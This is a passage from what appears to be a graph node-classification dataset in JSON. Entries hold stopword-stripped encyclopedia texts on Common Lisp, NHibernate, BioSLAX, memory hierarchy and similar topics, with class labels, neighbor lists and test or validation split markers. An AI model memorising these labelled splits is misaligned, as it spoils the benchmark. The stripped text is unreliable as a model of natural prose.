lead unwanted surprising interactions common lisp special variable top-level binding behaves like global variable programming languages new value stored value simply replaces top-level binding careless replacement value global variable heart bugs caused use global variables however another way work special variable give new local binding within expression sometimes referred rebinding variable binding dynamically scoped variable temporarily creates new memory location variable associates name location binding effect references variable refer new binding previous binding hidden execution binding expression terminates temporary memory location gone old binding revealed original value intact course multiple dynamic bindings variable nested common lisp implementations support multithreading dynamic scopes specific thread execution thus special variables serve abstraction thread local storage one thread rebinds special variable rebinding effect variable threads value stored binding retrieved thread created binding thread binds special variable codice_58 codice_58 behaves like thread-local storage among threads rebind codice_58 behaves like ordinary global threads refer top-level binding codice_58 dynamic variables used extend execution context additional context information implicitly passed function function without appear extra function parameter especially useful control transfer pass layers unrelated code simply extended extra parameters pass additional data situation like usually calls global variable global variable must saved restored scheme n't break recursion dynamic variable rebinding takes care variable must made thread-local else big mutex must used scheme n't break threads dynamic scope implementations take care also common lisp library many standard special variables instance standard i/o streams stored top-level bindings well-known special variables standard output stream stored *standard-output* suppose function foo writes standard output capture output character string *standard-output* bound string stream called common lisp supports lexical environments formally bindings lexical environment lexical scope may either indefinite extent dynamic extent depending type namespace lexical scope means visibility physically restricted block binding established references textually i.e lexically embedded block simply see binding tags tagbody lexical scope expression go x erroneous actually embedded tagbody contains label x however label bindings disappear tagbody terminates execution dynamic extent block code re-entered invocation lexical closure invalid body closure try transfer control tag via go tagbody executed first evaluates setf form stores function special variable *stashed* go end-label transfers control end-label skipping code print hello since end-label end tagbody tagbody terminates yielding nil suppose previously remembered function called situation erroneous one implementation response error condition containing message go tagbody tag some-label already left function tried evaluate go some-label lexically embedded tagbody resolves label however tagbody n't executing extent ended control transfer take place local function bindings lisp lexical scope variable bindings also lexical scope default contrast go labels indefinite extent lexical function variable binding established binding continues exist long references possible even construct established binding terminated references lexical variables functions termination establishing construct possible thanks lexical closures lexical binding default binding mode common lisp variables individual symbol switched dynamic scope either local declaration global declaration latter may occur implicitly use construct like defvar defparameter important convention common lisp programming special i.e dynamically scoped variables names begin end asterisk sigil codice_62 called “ earmuff convention ” adhered convention effectively creates separate namespace special variables variables intended lexical accidentally made special lexical scope useful several reasons firstly references variables functions compiled efficient machine code run-time environment structure relatively simple many cases optimized stack storage opening closing lexical scopes minimal overhead even cases full closures must generated access closure environment still efficient typically variable becomes offset vector bindings variable reference becomes simple load store instruction base-plus-offset addressing mode secondly lexical scope combined indefinite extent gives rise lexical closure turn creates whole paradigm programming centered around use functions first-class objects root functional programming thirdly perhaps importantly even lexical closures exploited use lexical scope isolates program modules unwanted interactions due restricted visibility lexical variables private one module binds lexical variable x calls another module b references x b accidentally resolve x bound b simply access x situations disciplined interactions variable desirable common lisp provides special variables special variables allow module set binding variable x visible another module b called able advantage able prevent happening also advantage consequently common lisp supports lexical dynamic scope macro lisp superficially resembles function usage however rather representing expression evaluated represents transformation program source code macro gets source surrounds arguments binds parameters computes new source form new form also use macro macro expansion repeated new source form use macro final computed form source code executed runtime typical uses macros lisp various standard common lisp features also need implemented macros macros defined defmacro macro special operator macrolet allows definition local lexically scoped macros also possible define macros symbols using define-symbol-macro symbol-macrolet paul graham book lisp describes use macros common lisp detail doug hoyte book let lambda extends discussion macros claiming macros single greatest advantage lisp programming language single greatest advantage programming language hoyte provides several examples iterative development macros macros allow lisp programmers create new syntactic forms language one typical use create new control structures example macro provides codice_73 looping construct syntax macro definition tagbody primitive common lisp special operator provides ability name tags use go form jump tags backquote provides notation provides code templates value forms preceded comma filled forms preceded comma at-sign spliced tagbody form tests end condition condition true jumps end tag otherwise provided body code executed jumps start tag example form using macro code expanded using function macroexpand-1 expansion example looks like macro expansion value variable test random 10 0 value variable body write-line hello body list forms symbols usually automatically upcased expansion uses tagbody two labels symbols labels computed gensym interned package two go forms use tags jump since tagbody primitive operator common lisp macro expanded something else expanded form uses macro also expanded fully expanding source form called code walking fully expanded walked form form replaced primitive macros must expanded source code containing evaluated compiled normally macros considered functions accept return s-expressions similar abstract syntax trees limited functions invoked evaluator compiler produce final source code macros written normal common lisp may use common lisp third-party operator available common lisp macros capable commonly called variable capture symbols macro-expansion body coincide calling context allowing programmer create macros wherein various symbols special meaning term variable capture somewhat misleading namespaces vulnerable unwanted capture including operator function namespace tagbody label namespace catch tag condition handler restart namespaces variable capture introduce software defects happens one following two ways scheme dialect lisp provides macro-writing system provides referential transparency eliminates types capture problem type macro system sometimes called hygienic particular proponents regard macro systems automatically solve problem unhygienic common lisp macro hygiene ensured one two different ways one approach use gensyms guaranteed-unique symbols used macro-expansion without threat capture use gensyms macro definition manual chore macros written simplify instantiation use gensyms gensyms solve type 2 capture easily applicable type 1 capture way macro expansion rename interfering symbols surrounding code capture references gensyms could used provide stable aliases global symbols macro expansion needs macro expansion would use secret aliases rather well-known names redefinition well-known names would ill effect macro another approach use packages macro defined package simply use internal symbols package expansion use packages deals type 1 type 2 capture however packages n't solve type 1 capture references standard common lisp functions operators reason use packages solve capture problems revolves around use private symbols symbols one package imported otherwise made visible packages whereas common lisp library symbols external frequently imported made visible user-defined packages following example unwanted capture operator namespace occurring expansion macro codice_73 macro expand form calls codice_75 intended refer standard common lisp macro codice_75 however context codice_75 may completely different meaning codice_73 may work properly common lisp solves problem shadowing standard operators functions forbidding redefinition redefines standard operator codice_75 preceding actually fragment non-conforming common lisp allows implementations diagnose reject condition system responsible exception handling common lisp provides conditions handler restart s. condition objects describing exceptional situation example error condition signaled common lisp system searches handler condition type calls handler handler search restarts use one restarts automatically repair current problem using information condition type relevant information provided part condition object call appropriate restart function restarts unhandled code presented users part user interface debugger example user select invoke one available restarts since condition handler called context error without unwinding stack full error recovery possible many cases exception handling systems would already terminated current routine debugger also customized replaced using codice_80 dynamic variable code found within unwind-protect forms finalizers also executed appropriate despite exception following example using symbolics genera user tries open file lisp function test called read-eval-print-loop repl file exist lisp system presents four restarts user selects retry open using different pathname restart enters different pathname lispm-init.lisp instead lispm-int.lisp user code contain error handling code whole error handling restart code provided lisp system handle repair error without terminating user code common lisp includes toolkit object-oriented programming common lisp object system clos one powerful object systems available language example peter norvig explains many design patterns simpler implement dynamic language features clos multiple inheritance mixins multimethods metaclasses method combinations etc. several extensions common lisp object-oriented programming proposed included ansi common lisp standard eventually clos adopted standard object-system common lisp clos dynamic object system multiple dispatch multiple inheritance differs radically oop facilities found static languages c++ java dynamic object system clos allows changes runtime generic functions classes methods added removed classes added redefined objects updated class changes class objects changed clos integrated ansi common lisp generic functions used like normal functions first-class data type every clos class integrated common lisp type system many common lisp types corresponding class potential use clos common lisp specification say whether conditions implemented clos pathnames streams could implemented clos usage possibilities clos ansi common lisp part standard actual common lisp implementations use clos pathnames streams input–output conditions implementation clos lisp interpreter directly executes lisp source code provided lisp objects lists symbols numbers ... read s-expressions lisp compiler generates bytecode machine code lisp source code common lisp allows individual lisp functions compiled memory compilation whole files externally stored compiled code fasl files several implementations earlier lisp dialects provided interpreter compiler unfortunately often semantics different earlier lisps implemented lexical scoping compiler dynamic scoping interpreter common lisp requires interpreter compiler use lexical scoping default common lisp standard describes semantics interpreter compiler compiler called using function compile individual functions using function compile-file files common lisp allows type declarations provides ways influence compiler code generation policy latter various optimization qualities given values 0 important 3 important speed space safety debug compilation-speed also function evaluate lisp code codice_81 codice_81 takes code pre-parsed s-expressions like languages text strings way code constructed usual lisp functions constructing lists symbols code evaluated function codice_81 several common lisp implementations like clozure cl sbcl implementing codice_81 using compiler way code compiled even though evaluated using function codice_81 file compiler invoked using function compile-file generated file compiled code called fasl fast load file fasl files also source code files loaded function load running common lisp system depending implementation file compiler generates byte-code example java virtual machine c language code compiled c compiler directly native code common lisp implementations used interactively even though code gets fully compiled idea interpreted language thus apply interactive common lisp language makes distinction read-time compile-time load-time run-time allows user code also make distinction perform wanted type processing wanted step special operators provided especially suit interactive development instance codice_86 assign value provided variable n't already bound codice_87 always perform assignment distinction useful interactively evaluating compiling loading code live image features also provided help writing compilers interpreters symbols consist first-level objects directly manipulable user code codice_88 special operator allows create lexical bindings programmatically packages also manipulable lisp compiler available runtime compile files individual functions make easy use lisp intermediate compiler interpreter another language following program calculates smallest number people room probability completely unique birthdays less 50 birthday paradox 1 person probability obviously 100 2 364/365 etc. answer 23 convention constants common lisp enclosed characters calling example function using repl read eval print loop define class codice_89 method displaying name age person next define group persons list codice_89 objects iterate sorted list prints three names descending age use loop macro demonstrated example use compare built exponentiation with-open-file macro opens file provides stream form returning file automatically closed funcall calls function object loop collects lines match predicate function available-shells calls function list-matching-lines pathname anonymous function predicate predicate returns pathname shell nil string filename shell example results mac os x 10.6 common lisp frequently compared contrasted scheme—if two popular lisp dialects scheme predates cl comes lisp tradition engineers—guy l. steele gerald jay sussman designed scheme chaired standards committee common lisp common lisp general-purpose programming language contrast lisp variants emacs lisp autolisp extension languages embedded particular products gnu emacs autocad respectively unlike many earlier lisps common lisp like scheme uses lexical variable scope default interpreted compiled code lisp systems whose designs contributed common lisp—such zetalisp franz lisp—used dynamically scoped variables interpreters lexically scoped variables compilers scheme introduced sole use lexically scoped variables lisp inspiration algol 68 widely recognized good idea cl supports dynamically scoped variables well must explicitly declared special differences scoping ansi cl interpreters compilers common lisp sometimes termed lisp-2 scheme lisp-1 referring cl use separate namespaces functions variables fact cl many namespaces go tags block names codice_72 keywords long-standing controversy cl scheme advocates tradeoffs involved multiple namespaces scheme broadly necessary avoid giving variables names clash functions scheme functions frequently arguments named codice_92 codice_93 codice_94 conflict system function codice_95 however cl necessary explicitly refer function namespace passing function argument—which also common occurrence codice_11 example cl also differs scheme handling boolean values scheme uses special values f represent truth falsity cl follows older lisp convention using symbols nil nil standing also empty list cl non-nil value treated true conditionals codice_68 whereas scheme non- f values treated true conventions allow operators languages serve predicates answering boolean-valued question returning useful value computation scheme value equivalent nil common lisp evaluates true boolean expression lastly scheme standards documents require tail-call optimization cl standard cl implementations offer tail-call optimization although often programmer uses optimization directive nonetheless common cl coding style favor ubiquitous use recursion scheme style prefers—what scheme programmer would express tail recursion cl user would usually express iterative expression codice_75 codice_99 codice_72 recently codice_101 package see category common lisp defined specification like ada c rather one implementation like perl version 6 many implementations standard details areas may validly differ addition implementations tend come extensions provide functionality covered standard free open-source software libraries created support extensions common lisp portable way notably found repositories common-lisp.net clocc common lisp open code collection projects common lisp implementations may use mix native code compilation byte code compilation interpretation common lisp designed support incremental compilers file compilers block compilers standard declarations optimize compilation function inlining type specialization proposed language specification common lisp implementations compile source code native machine code implementations create optimized stand-alone applications others compile interpreted bytecode less efficient native code eases binary-code portability also compilers compile common lisp code c code misconception lisp purely interpreted language likely lisp environments provide interactive prompt code compiled one-by-one incremental way common lisp incremental compilation widely used unix-based implementations clisp sbcl used scripting language invoked system transparently way perl unix shell interpreter see category common lisp used develop research applications often artificial intelligence rapid development prototypes deployed applications common lisp used many commercial applications including yahoo store web-commerce site originally involved paul graham later rewritten c++ perl notable examples include also exist open-source applications written common lisp since 2011 zach beane support common lisp foundation maintained quicklisp library manager allows automatic download installing loading 3600 libraries required work one implementation common lisp license allows redistribution chronological list books published published common lisp language programming common lisp especially ai programming",
    "neighbors": [
      10752,
      4097,
      4101,
      11269,
      2056,
      2062,
      9231,
      2576,
      2577,
      6160,
      7184,
      1556,
      9749,
      8728,
      2585,
      4122,
      4633,
      3613,
      8735,
      8226,
      8738,
      8739,
      2603,
      11307,
      5677,
      11310,
      3119,
      7732,
      9780,
      2102,
      1591,
      7734,
      2105,
      6201,
      3132,
      6717,
      6718,
      2557,
      8258,
      8771,
      10819,
      8262,
      9288,
      74,
      1611,
      1613,
      595,
      84,
      9299,
      9816,
      10841,
      3675,
      7267,
      2660,
      8293,
      102,
      9828,
      3176,
      1129,
      2666,
      2667,
      7273,
      7274,
      5743,
      8303,
      8304,
      5751,
      9848,
      3705,
      5754,
      1147,
      5245,
      7805,
      1152,
      9345,
      1666,
      2179,
      2181,
      1159,
      5255,
      1673,
      2186,
      9865,
      6797,
      655,
      3728,
      9875,
      148,
      9877,
      5783,
      155,
      6821,
      4779,
      5803,
      2225,
      11442,
      7347,
      8883,
      4791,
      6840,
      7867,
      190,
      4799,
      6335,
      1731,
      7880,
      5833,
      6345,
      9416,
      8908,
      205,
      5837,
      10953,
      4822,
      7896,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      10983,
      11495,
      4846,
      5360,
      5361,
      242,
      8435,
      9969,
      10480,
      9975,
      6906,
      1277,
      7421,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      5896,
      269,
      8973,
      10510,
      5395,
      1812,
      1301,
      1813,
      791,
      9491,
      11028,
      8474,
      10012,
      3869,
      5917,
      2335,
      6941,
      2849,
      8993,
      10526,
      3370,
      5420,
      7981,
      7983,
      2352,
      7987,
      10547,
      11255,
      823,
      311,
      6969,
      4410,
      10555,
      7487,
      8002,
      1347,
      1348,
      2885,
      1353,
      11083,
      8524,
      335,
      3408,
      6994,
      11604,
      1365,
      9557,
      10581,
      2392,
      10584,
      10586,
      4955,
      8539,
      6493,
      11098,
      10083,
      6502,
      11625,
      8554,
      9579,
      1388,
      5492,
      1397,
      3446,
      10104,
      377,
      1920,
      4992,
      2438,
      8582,
      10630,
      7562,
      1931,
      9614,
      5521,
      3990,
      7067,
      6556,
      10654,
      6047,
      1952,
      1953,
      9631,
      10145,
      4516,
      5031,
      1448,
      5033,
      5546,
      1963,
      428,
      5037,
      8618,
      9128,
      5040,
      4529,
      9151,
      7616,
      5569,
      6594,
      963,
      5059,
      9666,
      4550,
      6603,
      7629,
      11218,
      11219,
      5588,
      6102,
      4056,
      4057,
      3034,
      2011,
      4572,
      10712,
      11226,
      4069,
      3051,
      5611,
      5612,
      7148,
      7662,
      499,
      8691,
      502,
      7670,
      1016,
      11259,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 2063,
    "label": 1,
    "text": "NHibernate:nhibernate nhibernate object-relational mapping orm solution microsoft .net platform provides framework mapping object-oriented domain model traditional relational database purpose relieve developer significant portion relational data persistence-related programming tasks nhibernate free open source software distributed gnu lesser general public license nhibernate port hibernate nhibernate primary feature mapping .net classes database tables clr data types sql data types nhibernate also provides data query retrieval facilities nhibernate generates sql commands relieves developer manual data set handling object conversion keeping application portable sql databases database portability delivered little performance overhead nhibernate provides transparent persistence plain old clr objects pocos strict requirement persistent class no-argument constructor public proper behavior applications also requires special attention equals gethashcode methods nhibernate started tom barrett later picked mike doerfler peter smulovics end 2005 jboss inc. part red hat hired sergey koshcheyev lead developer nhibernate work full-time future versions end 2006 jboss stopped support project entirely developed led community version 1.0 mirrored feature set hibernate 2.1 well number features hibernate 3 nhibernate 1.2.1 released november 2007 introduced many features hibernate 3 support .net 2.0 stored procedures generics nullable types nhibernate 2.0 released august 23 2008 comparable hibernate 3.2 terms features version 2.0 release nhibernate dropped support .net 1.1 nhibernate 2.1 released july 17 2009 nhibernate 3.0 released december 4 2010 first version use .net 3.5 features nhibernate 3.2 released april 2011 new features nhibernate 4.0 released august 17 2014 version requires .net framework 4.0 later nhibernate 5.0 released october 10 2017 provides support asynchronous programming version requires .net framework 4.6.1 later nhibernate 5.1 released march 17 2018 supports .net standard 2.0 .net core 2.0 nhibernate 5.2 released december 4 2018 open source software nhibernate received many contributions users implementation linq allowed language integrated query use nhibernate code snippet add object database shows retrieve modify update object database using nhibernate nhibernate configuration may affect nhibernate executes sql statements",
    "neighbors": [
      5952,
      9286,
      3080,
      5612,
      6860,
      10413,
      7983,
      9455,
      9467,
      3763,
      3573,
      632,
      9177,
      5403
    ],
    "mask": "None"
  },
  {
    "node_id": 2064,
    "label": 2,
    "text": "BioSLAX:bioslax bioslax live cd/live dvd/live usb comprising suite 300 bioinformatics tools application suites released bioinformatics resource unit life sciences institute lsi national university singapore nus bootable pc allows cd/dvd usb boot option runs compressed slackware flavour linux operating system os also known slax slax created tomáš matějíček czech republic using linux live scripts also developed bioslax derivative created mark de silva lim kuan siong tan tin wee bioslax first released nus life science curriculum april 2006 january 2003 apbionet received research grant pan asia networking pan programme idrc canada build apbiobox commonly used bioinformatics applications packages grid-computing software part effort build apbiogrid platform chosen ubiquitous redhat linux march year apbionet launched industry partnership scheme aips partnered sun microsystems build biobox solaris platform six months later beta versions apbiobox sun biobox called bio-cluster grid released beta testing among selected parties packages included globus grid toolkit version 2.0 sun grid engine respectively 4 december 2003 biobox software packages named apbiobox redhat linux biocluster grid sun solaris field-tested bioinformatics workshop conducted advanced science technology institute asti department science technology dost philippines occasion 70th anniversary national research council philippines nrcp ten pentium machines couple sun servers successfully inducted apbiogrid workshop software tested sponsored sun microsystems partially funded idrc july 2004 dr derek kiong introduced knoppix stable powerful small-footprint unix debian-based platform a/prof tan tin wee workshop organised institute systems science iss nus september 2004 mr ong guan sin able create knoppix remaster template building software apbiobox plus useful applications prototype apbioknoppix project practical course lsm2104 module dept biochemistry nus subsequently upgraded based knoppix 4.02 released apbioknoppix2 apbioknoppix widely used found easily expandable applications place prior remastering made distribution highly inflexible june 2005 mr. mark de silva bioinformatics resource unit life sciences institute lsi suggested using slax base new bio-based live cd due modular system effectively allowed base system used various tools changes included top base easily adding single modules application files changes eliminated need remaster entire system every time new software changes emerged case knoppix april 2006 first version bioslax released several editions bioslax subsequently used bioinformatics teaching module within nus life science curriculum well several events organized umbrella asia pacific bioinformatics network apbionet apbionet regional affiliate international society computational biology iscb customized versions built cater nus apbionet august 2007 collaboration apbionet customized bioslax used set bioinformatics resource node vietnam bio-ibt bioinformatics resource server institute biotechnology vietnam academy science technology hanoi viet nam bio-ibt node offered users ssh access server also access many command line based bio/life science applications entire project done collaboration 1st unesco-iubmb-faobmb-apbionet bioinformatics workshop vietnam held 20th 31 august 2007 satellite event 6th international conference bioinformatics incob 2007 hongkong hanoi nansha versions bioslax deployed international institutions apbionet fitted small tool allowed map ips dynamically created apbionet.org domain name hence giving machine fully qualified domain name fqdn presence internet slax worked overlaying application modules top base linux os made entire distribution modular additional functionality deploying modules even system already running made using slax even appealing inclusion gui based bioslax module manager made process dynamically adding removing modules even easier users able test updates software new versions rollback previous versions want especially effective slax/bioslax installed writable medium usb drive date two versions bioslax bioslax 5.x based slax 5 bioslax 7.x based slax 6 bioslax 5.x followed version numbers slax 5 bioslax 7 adopted new version numbering one higher slax version based latest versions downloaded bioslax website bioslax 5.x largely based 5.1.8 version slax running earlier versions 2.6 linux kernel kde 3.4 unionfs edition runs kde x window gui comes tools application suites include compiler tools linux kernel source code headers mainly suited users need use tools applications suites small size making easy download particularly convenient regions internet bandwidth issue edition runs kde x window gui comes tools application suites also includes full set development compiler tools also including linux kernel source code headers edition power user addition using various tools applications might want also compile new applications create new application modules bioslax edition include x window gui compilation tools linux kernel source kernel headers primarily meant used remote server users either ssh use command line applications connect server via web access available web-based portals popular bio applications edition developer edition customized use nus life science curriculum teaching bioinformatics edition developer edition includes taverna taverna project aims provide language software tools facilitate easy use workflow distributed compute technology bioslax 7.x based slax 6 features later releases 2.6 linux kernel kde 3.5 using aufs lzma compression biggest change use version either client server distribution also moved cd dvd allowing applications introduced previously left version 5.x due space considerations ability boot fat ext formatted usb drive also introduced slax 6 hence bioslax 7.x versions also feature effectively enabling persistent file handling unavailable cd/dvd re- writable versions bioslax 7.x delayed due base distribution slax developer tomáš matějíček refusing move forward new version family commitments however primary reason moving forward waiting squash fs lzma integrated linux kernel default instead users needing apply separate patches kernel 2.6.38 integration finally done prompted tomáš matějíček look new version slax therefore result new version bioslax coming months one follow thoughts new version slax blog bioslax features linux slackware 12.1 operating system updated drivers various network adapters including support large variety wireless cards also many useful basic tools applications bioinformatics tools applications subdivided three main categories one intriguing features slax-based distributions easy convert live os full-fledged linux system installed hard drive pc take roughly 3.5gbytes space tool written kde kommander toolkit called bioslax installer provided users easily convert live os full linux installation using modules customize distribution using installer users rapid deployment fully installed customized clients bioslax updated newer slackware slax versions released tools applications suites also monitored significant changes upgraded necessary tools may removed make way tools thing added functionality better efficiency web-based portals looked example portals readseq primer3 genesplicer pipeline developers also looking integrating various grid computing platforms bioslax bioslax booted immediately cd/dvd/usb used rapidly deployable grid-enabled operating system one grid platform univa grid platform using univa grid mp agent shown gridasia 2009 talk given tan tin wee agent modularized bioslax used grid enable machines location slave-nodes master-node located elsewhere effectively creating global-wide grid proof-of-concept endeavour developers successfully deployed bioslax instances pool resources using vmware esxi citrix xen hypervisors aim effectively create bioslax cloud students staff may instantiate number bioslax servers dynamically research education conduct bioinformatics practical labs students connect servers via suitable x window clients x-win32 vnc exceed nomachine nx deployed manner used conjunction ud grid mpagent may used form cluster processing large jobs proof-of-concept highly successful deployed research education life science curriculum nus 2011 number bioslax cloud instances vmware vsphere citrix xen servers used apbionet project biodb100 backend controls automation created implemented using various apis vsphere xen mr. mark de silva developers also talks amazon 2009 2010 deploy similar bioslax cloud images amazon ec2 hoping push research education machines amazon cutting costs hardware discussions however fell clear amazon going support full hardware virtualization required order run bioslax images cloud supporting para-virtualizaion fact stand commercial cloud providers using citrix xen hypervisors mind-set entities change private clouds running citrix xen hypervisors configured full hardware virtualization vmware vsphere clouds clouds capable running bioslax",
    "neighbors": [
      9693,
      1185,
      9602,
      6371,
      5956,
      8644,
      8837,
      10022,
      10149,
      10341,
      7022,
      5363,
      8214,
      823,
      11418,
      7483,
      4637,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 2065,
    "label": 9,
    "text": "Syntax-directed_translation:syntax-directed translation syntax-directed translation refers method compiler implementation source language translation completely driven parser common method syntax-directed translation translating string sequence actions attaching one action rule grammar thus parsing string grammar produces sequence rule applications sdt provides simple way attach semantics syntax syntax-directed translation fundamentally works adding actions productions context-free grammar resulting syntax-directed definition sdd actions steps procedures carried production used derivation grammar specification embedded actions performed called syntax-directed translation scheme sometimes simply called 'translation scheme symbol grammar attribute value associated symbol common attributes could include variable type value expression etc given symbol x attribute attribute referred x thus given actions attributes grammar used translating strings language applying actions carrying information symbol attribute early metacompilers use terms syntax-driven syntax-directed translation descriptions metaprogramming language features outputting code see metacompiler meta ii tree-meta",
    "neighbors": [
      1952,
      7009,
      9002,
      2316,
      7634,
      2751
    ],
    "mask": "Test"
  },
  {
    "node_id": 2066,
    "label": 3,
    "text": "Memory_hierarchy:memory hierarchy computer architecture memory hierarchy separates computer storage hierarchy based response time since response time complexity capacity related levels may also distinguished performance controlling technologies memory hierarchy affects performance computer architectural design algorithm predictions lower level programming constructs involving locality reference designing high performance requires considering restrictions memory hierarchy i.e size capabilities component various components viewed part hierarchy memories ... member typically smaller faster next highest member hierarchy limit waiting higher levels lower level respond filling buffer signaling activating transfer four major storage levels general memory hierarchy structuring many structures useful example paging algorithm may considered level virtual memory designing computer architecture one include level nearline storage online offline storage number levels memory hierarchy performance level increased time type memory storage components also change historically example memory hierarchy intel haswell mobile processor circa 2013 lower levels hierarchy – disks downwards – also known tiered storage formal distinction online nearline offline storage example always-on spinning disks online spinning disks spin-down massive array idle disk maid nearline removable media tape cartridges automatically loaded tape library nearline cartridges must manually loaded offline modern cpus fast program workloads bottleneck locality reference memory accesses efficiency caching memory transfer different levels hierarchy result cpu spends much time idling waiting memory i/o complete sometimes called space cost larger memory object likely overflow small/fast level require use larger/slower level resulting load memory use known pressure respectively register pressure cache pressure main memory pressure terms data missing higher level needing fetched lower level respectively register spilling due register pressure register cache cache miss cache main memory hard page fault main memory disk modern programming languages mainly assume two levels memory main memory disk storage though assembly language inline assemblers languages c registers directly accessed taking optimal advantage memory hierarchy requires cooperation programmers hardware compilers well underlying support operating system many programmers assume one level memory works fine application hits performance wall memory hierarchy assessed code refactoring",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      3615,
      8231,
      7218,
      1083,
      2620,
      10811,
      2623,
      2113,
      7234,
      3142,
      8262,
      2638,
      5725,
      1122,
      3175,
      8301,
      8815,
      630,
      8822,
      6268,
      3725,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      5363,
      757,
      2805,
      10485,
      249,
      8446,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      2383,
      7505,
      9044,
      11604,
      2396,
      8543,
      1376,
      1378,
      10603,
      4465,
      372,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      407,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      10706,
      1499,
      477,
      1502,
      5090,
      995,
      4581,
      9707,
      10734,
      6639,
      499,
      4596,
      4598,
      8700,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2067,
    "label": 4,
    "text": "Supply_chain_cyber_security:supply chain cyber security supply chain cyber security refers efforts enhance cyber security within supply chain subset supply chain security focused management cyber security requirements information technology systems software networks driven threats cyber-terrorism malware data theft advanced persistent threat apt typical supply chain cyber security activities minimizing risks include buying trusted vendors disconnecting critical machines outside networks educating users threats protective measures take acting deputy undersecretary national protection programs directorate united states department homeland security greg schaffer said hearing aware instances malware found imported electronic computer devices sold within united states",
    "neighbors": [
      2953,
      7515,
      4956,
      2461
    ],
    "mask": "Test"
  },
  {
    "node_id": 2068,
    "label": 1,
    "text": "Database_storage_structures:database storage structures database tables indexes may stored disk one number forms including ordered/unordered flat files isam heap files hash buckets b+ trees form particular advantages disadvantages commonly used forms b+ trees isam forms structures one aspect overall schema used database engine store information unordered storage typically stores records order inserted example heap unordered storage typically stores records order inserted storage offers good insertion efficiency formula_1 inefficient retrieval times formula_2 typically retrieval times better however databases use indexes primary keys resulting retrieval times formula_3 formula_1 keys database row offsets within storage system ordered storage typically stores records order may rearrange increase file size new record inserted resulting lower insertion efficiency however ordered storage provides efficient retrieval records pre-sorted resulting complexity formula_3 heap files lists unordered records variable size although sharing similar name heap files widely different in-memory heaps in-memory heaps ordered opposed heap files commonly used practice conventional relational databases use row-oriented storage meaning data associated given row stored together contrast column-oriented dbms store data given column together order quickly serve data warehouse-style queries correlation databases similar row-based databases apply layer indirection map multiple instances value numerical identifier",
    "neighbors": [
      10628,
      10632,
      8201,
      8979,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      3254,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      8393,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4065,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      7412,
      4598,
      1146,
      3196
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2069,
    "label": 9,
    "text": "Comparison_of_functional_programming_languages:comparison functional programming languages table shows comparison functional programming languages compares various features designs different functional programming languages",
    "neighbors": [
      10083,
      3876,
      228,
      3462,
      5031,
      6502,
      6536,
      8554,
      10819,
      3705,
      7386,
      7259
    ],
    "mask": "Test"
  },
  {
    "node_id": 2070,
    "label": 3,
    "text": "ICOMP_(index):icomp index icomp intel comparative microprocessor performance index published intel used measure relative performance microprocessors three revisions icomp index version 1.0 benchmarked 486sx 25 version 2.0 benchmarked pentium 120",
    "neighbors": [
      10601,
      2081,
      3565,
      1911
    ],
    "mask": "Test"
  },
  {
    "node_id": 2071,
    "label": 3,
    "text": "Quantum_Effect_Devices:quantum effect devices quantum effect devices qed microprocessor design company incorporated 1991 quantum effect design based palo alto california three founders tom riordan earl killian ray kunita senior managers mips computer systems inc.. left mips time company difficult time selling entire computer systems mips magnum instead concentrating building microprocessor chips mips original mission soon sgi purchased mips idt major funder customer initial qed design original product plan qed build mips microprocessor laptop computer ace initiative microsoft support multiple risc architectures new windows nt operating system system companies like deskstation technology board companies like shablamm computer building products hope risc-based personal computers would become mainstream market never materialized first product r4600 orion microprocessor proved successful several embedded markets networking routers arcade games subsequent projects designed companies toshiba idt r4700 idt nkk r4650 sgi nec r5000 powerpc 603q powerpc microprocessor designed motorola meant apple computer home pc game machine designs neither designs productized powerpc 603q never reached full production several years later attempt increase product revenue company transformed product company selling line mips microprocessors time company changed name quantum effect devices successful products introductions like rm5200 rm7000 riscmark label company ipo 1 february 2000 initial stock price 16 jumped 56.50 first day trading company acquired pmc-sierra october 2000 time quantum effect devices valued stock swap worth 2.3 billion according one estimate company became microprocessor products division pmc acquisition done stock exchange valued 2.3 billion team completed rm9x00 product line pmc product line successful marketplace microprocessor core development team derived qed laid group pmc-sierra june 2005 last laid january 2006 company name attributed tom riordan believed company would survive age semiconductor geometry dimensions would become small quantum effects would dominate circuit behavior first qed microprocessor r4600 founders qed previously involved r4000 felt large device complicated simpler implementation would give better price/performance ratio reason r4600 re-implementation 5-stage classic risc pipeline large time caches small low cost device one highest performance microprocessors market initial target market mips laptop computer never materialized device found success several markets first risc processor used within cisco systems network router used several atari/midway arcade games well-known original mortal kombat game r4600 licensed idt toshiba manufactured sold devices r4700 targeted sgi wanted little floating point performance r4700 improved repeat rate floating point multiply instructions device used inside sgi indy low-end workstation r4700 licensed idt toshiba manufactured sold devices r4650 commissioned nkk desired cheaper implementation video console game machine r4650 achieved smaller die area cutting caches half implementing single precision floating-point device first qed device implemented multiply–accumulate instructions enabled software functions softmodem device used original microsoft webtv device r4650 licensed idt nkk manufactured sold devices r4640 chip system bus restricted 32-bits instead 64-bits r5000 commissioned sgi device doubled instruction data caches 32 kb implemented high-performance fully pipelined floating point unit multiply–accumulate capability srt divider device limited implementation superscalar instruction issue one integer instruction one floating-point instruction could issued one cycle device used sgi o2 sgi indy low-end workstations design owned sgi licensed 